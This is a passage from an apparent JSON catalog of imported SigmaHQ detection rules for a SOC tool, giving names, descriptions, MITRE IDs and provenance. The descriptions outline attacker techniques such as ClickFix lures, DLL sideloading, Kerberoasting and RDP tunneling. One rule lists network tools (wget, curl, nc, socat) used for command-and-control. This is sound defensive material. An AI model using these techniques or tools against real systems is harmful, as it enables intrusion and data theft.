"HackTool - Htran/NATBypass Execution", "description": "Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-htran-natbypass-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml" } }, { "id": "sigmahq-sigma-f5fe36cf-f1ec-4c23-903d-09a3110f6bbb", "type": "detection", "name": "Potential ClickFix Execution Pattern - Registry", "description": "Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links.\nClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages.\nThrough the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content,\nsuch as one-liners that execute remotely hosted malicious files or scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-clickfix-execution-pattern-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f5fe36cf-f1ec-4c23-903d-09a3110f6bbb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_potential_clickfix_execution.yml" } }, { "id": "sigmahq-sigma-f62176f3-8128-4faa-bf6c-83261322e5eb", "type": "detection", "name": "Malicious PowerShell Keywords", "description": "Detects keywords from well-known PowerShell exploitation frameworks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-powershell-keywords.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f62176f3-8128-4faa-bf6c-83261322e5eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" } }, { "id": "sigmahq-sigma-f63508a0-c809-4435-b3be-ed819394d612", "type": "detection", "name": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-privileged-system-service-operation-seloaddriverprivilege.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f63508a0-c809-4435-b3be-ed819394d612", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_user_driver_loaded.yml" } }, { "id": "sigmahq-sigma-f63b56ee-3f79-4b8a-97fb-5c48007e8573", "type": "detection", "name": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-dns-serverlevelplugindll-installed-via-dnscmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" } }, { "id": "sigmahq-sigma-f6451de4-df0a-41fa-8d72-b39f54a08db5", "type": "detection", "name": "PUA - PAExec Default Named Pipe", "description": "Detects PAExec default named pipe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-paexec-default-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_pua_paexec_default_pipe.yml" } }, { "id": "sigmahq-sigma-f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", "type": "detection", "name": "Suspicious Log Entries", "description": "Detects suspicious log entries in Linux log files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-log-entries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_shell_susp_log_entries.yml" } }, { "id": "sigmahq-sigma-f64c9b2d-b0ad-481d-9d03-7fc75020892a", "type": "detection", "name": "Potential RoboForm.DLL Sideloading", "description": "Detects potential DLL sideloading of \"roboform.dll\", a DLL used by RoboForm Password Manager", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-roboform-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f64c9b2d-b0ad-481d-9d03-7fc75020892a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_robform.yml" } }, { "id": "sigmahq-sigma-f64e5c19-879c-4bae-b471-6d84c8339677", "type": "detection", "name": "Webshell Tool Reconnaissance Activity", "description": "Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webshell-tool-reconnaissance-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f64e5c19-879c-4bae-b471-6d84c8339677", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_webshell_tool_recon.yml" } }, { "id": "sigmahq-sigma-f65e22f9-819e-4f96-9c7b-498364ae7a25", "type": "detection", "name": "Potential RemoteFXvGPUDisablement.EXE Abuse", "description": "Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remotefxvgpudisablement-exe-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml" } }, { "id": "sigmahq-sigma-f663a6d9-9d1b-49b8-b2b1-0637914d199a", "type": "detection", "name": "Narrator's Feedback-Hub Persistence", "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/narrator-s-feedback-hub-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" } }, { "id": "sigmahq-sigma-f674e36a-4b91-431e-8aef-f8a96c2aca35", "type": "detection", "name": "CurrentControlSet Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/currentcontrolset-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" } }, { "id": "sigmahq-sigma-f68c4a4f-19ef-4817-952c-50dce331f4b0", "type": "detection", "name": "Potential WizardUpdate Malware Infection", "description": "Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-wizardupdate-malware-infection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f68c4a4f-19ef-4817-952c-50dce331f4b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" } }, { "id": "sigmahq-sigma-f69a87ea-955e-4fb4-adb2-bb9fd6685632", "type": "detection", "name": "External Disk Drive Or USB Storage Device Was Recognized By The System", "description": "Detects external disk drives or plugged-in USB devices.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1091", "T1200" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/external-disk-drive-or-usb-storage-device-was-recognized-by-the-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_external_device.yml" } }, { "id": "sigmahq-sigma-f6c68d5f-e101-4b86-8c84-7d96851fd65c", "type": "detection", "name": "T1047 Wmiprvse Wbemcomn DLL Hijack", "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/t1047-wmiprvse-wbemcomn-dll-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml" } }, { "id": "sigmahq-sigma-f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "type": "detection", "name": "Script Event Consumer Spawning Process", "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/script-event-consumer-spawning-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_scrcons_susp_child_process.yml" } }, { "id": "sigmahq-sigma-f6de6525-4509-495a-8a82-1f8b0ed73a00", "type": "detection", "name": "Remote Task Creation via ATSVC Named Pipe", "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-task-creation-via-atsvc-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_atsvc_task.yml" } }, { "id": "sigmahq-sigma-f6de9536-0441-4b3f-a646-f4e00f300ffd", "type": "detection", "name": "Weak Encryption Enabled and Kerberoast", "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/weak-encryption-enabled-and-kerberoast.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" } }, { "id": "sigmahq-sigma-f6ecd1cf-19b8-4488-97f6-00f0924991a3", "type": "detection", "name": "PUA - Nmap/Zenmap Execution", "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nmap-zenmap-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nmap_zenmap.yml" } }, { "id": "sigmahq-sigma-f7158a64-6204-4d6d-868a-6e6378b467e0", "type": "detection", "name": "Suspicious C2 Activities", "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-c2-activities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7158a64-6204-4d6d-868a-6e6378b467e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" } }, { "id": "sigmahq-sigma-f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "type": "detection", "name": "Suspicious RDP Redirect Using TSCON", "description": "Detects a suspicious RDP session redirect using tscon.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1563.002", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rdp-redirect-using-tscon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tscon_rdp_redirect.yml" } }, { "id": "sigmahq-sigma-f7375e28-5c14-432f-b8d1-1db26c832df3", "type": "detection", "name": "Potential Arbitrary DLL Load Using Winword", "description": "Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-arbitrary-dll-load-using-winword.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7375e28-5c14-432f-b8d1-1db26c832df3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_winword_dll_load.yml" } }, { "id": "sigmahq-sigma-f7385ee2-0e0c-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation CLIP+ Launcher - System", "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-clip-launcher-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml" } }, { "id": "sigmahq-sigma-f742bde7-9528-42e5-bd82-84f51a8387d2", "type": "detection", "name": "Uncommon Microsoft Office Trusted Location Added", "description": "Detects changes to registry keys related to \"Trusted Location\" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-microsoft-office-trusted-location-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f742bde7-9528-42e5-bd82-84f51a8387d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_trusted_location_uncommon.yml" } }, { "id": "sigmahq-sigma-f7644214-0eb0-4ace-9455-331ec4c09253", "type": "detection", "name": "Kerberos Manipulation", "description": "Detects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1212" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kerberos-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7644214-0eb0-4ace-9455-331ec4c09253", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" } }, { "id": "sigmahq-sigma-f772cee9-b7c2-4cb2-8f07-49870adc02e0", "type": "detection", "name": "Malicious Nishang PowerShell Commandlets", "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-nishang-powershell-commandlets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" } }, { "id": "sigmahq-sigma-f7997770-92c3-4ec9-b112-774c4ef96f96", "type": "detection", "name": "Winlogon AllowMultipleTSSessions Enable", "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winlogon-allowmultipletssessions-enable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7997770-92c3-4ec9-b112-774c4ef96f96", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml" } }, { "id": "sigmahq-sigma-f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", "type": "detection", "name": "Privileged Account Creation", "description": "Detects when a new admin is created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/privileged-account-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_privileged_account_creation.yml" } }, { "id": "sigmahq-sigma-f7b5f842-a6af-4da5-9e95-e32478f3cd2f", "type": "detection", "name": "MsiExec Web Install", "description": "Detects suspicious msiexec process starts with web addresses as parameter", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msiexec-web-install.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml" } }, { "id": "sigmahq-sigma-f7d7ebd5-a016-46e2-9c54-f9932f2d386d", "type": "detection", "name": "Potential RDP Tunneling Via SSH", "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rdp-tunneling-via-ssh.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml" } }, { "id": 